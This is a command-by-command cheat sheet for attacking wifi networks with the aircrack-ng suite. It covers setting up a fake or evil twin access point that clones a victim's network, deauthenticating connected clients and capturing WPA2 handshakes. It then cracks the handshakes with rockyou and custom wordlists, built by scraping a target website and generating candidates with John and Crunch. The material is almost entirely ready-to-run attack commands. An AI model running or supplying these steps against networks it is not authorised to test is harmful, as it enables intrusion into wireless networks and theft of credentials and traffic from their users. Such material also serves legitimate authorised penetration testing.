Airbase-ng – Evil Twin

Check wifi interface

  • iwconfig

Turn up the power

  • iwconfig wlan0 txpower 27

Start wifi interface

  • airmon-ng start wlan0

Capture data & choose target AP

  • airodump-ng wlan0mon

Create Fake AP

  • airbase-ng wlan0mon -c 11 -a 20:34:67:24:89:76  -e FakeAP -v -z 2

Create Evil Twin AP

  • airbase-ng -a [victim AP MAC] -c 11-Z 4 --essid VictimAP wlan0mon

Monitor Evil Twin AP

  • airodump-ng --bssid [victim AP MAC] wlan0mon --channel 11 -w /root/Desktop/rougueap

Deauthentication

  • aireplay-ng -0 2 -a [router bssid] -c [Client MAC address] wlan0mon

Aircrack

  • aircrack-ng -b [victim AP MAC] -w /usr/share/wordlists/rockyou.txt rougue-01.cap

Custom wordlists

Using John

  • Download target site
    • # wget -r -l 2 www.<targetwebsite>.com
  • Produce uniq list
    • # grep -hr "" www.<targetwebsite>.com/ | tr '[:space:]' '\n' | sort | uniq > wordlist.lst
  • Clean list
    • # egrep -v '('\,'|'\;'|'\}'|'\{'|'\<'|'\>'|'\:'|'\='|'\"'|'\/'|'\/'|'\['|'\]')' wordlist.lst | sort -u > wordlist.clean.lst
  • Regenerate list w/ John
    • # john --wordlist=wordlist.clean.lst --rules --stdout | uniq > final.wordlist.lst

Using Crunch

Syntax: crunch <min> max<max> <characterset> -t <pattern> -o <output filename>

  • Letters and numbers mixed, minimum 8 max 8 letters
    • # crunch 8 8 -f /usr/share/rainbowcrack/charset.txt mixalpha -o /root/alphawordlist.lst
  • Password set to 10 char with the last four set to fixed &  first six to be variable
    • # crunch 10 10 -t @@@@@@0728 -o /root/birthdaywordlist.lst

WPA2 + Aircrack-ng

  1. Show wifi interfaces
    1. airmon-ng
    2. airmon-ng check kill ( If wifi interface doesn’t show up correctly)
  2. Start wifi interface
    1. airmon-ng start wlan0
  3. Scan for wifi networks
    1. airodump-ng wlan0mon
  4. Choose wifi to test
    1. ctrl+c to stop scanning
    2. # airodump-ng -c 11 --bssid [router bssid] -w /root/Desktop/wpa2handshake.cap mon0
    3. # airodump-ng --ignore-negative-one --bssid [router bssid] -c 11 -w /root/Desktop/wpa2handshake.cap mon0 (Alternative method)
  5. DeAuth clients on victim AP
    1. # aireplay-ng -0 2 -a [router bssid] -c 40:A6:D9:1F:4A:D3(Client MAC address) mon0
    2. Wait for handshake to be captured
  6. Crack handshake
    1. # aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap